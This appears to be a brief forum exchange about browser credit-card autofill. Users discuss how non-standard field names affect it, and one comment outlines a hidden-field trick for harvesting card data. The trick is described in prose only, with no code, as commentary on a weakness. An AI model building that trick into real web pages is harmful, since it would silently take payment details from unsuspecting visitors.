[stevarino]

This requires the browser to recognize it as a credit card field.

Suppose a form uses a non-standard name for the field (say a localized name), and a user enters it at a legitimate site. Any attacker simply has to find these non-standard names for auto-complete to fill this in.

I feel like I've seen a credit card autofill before outside of normal controls.

[jazoom]

But then the browser won't autofill it, so what's the problem?

[sharkoz]

It will if the attacker uses the same custom name for his field. The attacker could try to suck as much data as possible by creating thousands of hidden fields having a lot of possible combinations for the names of these non-standard CC fields, and wait to get lucky.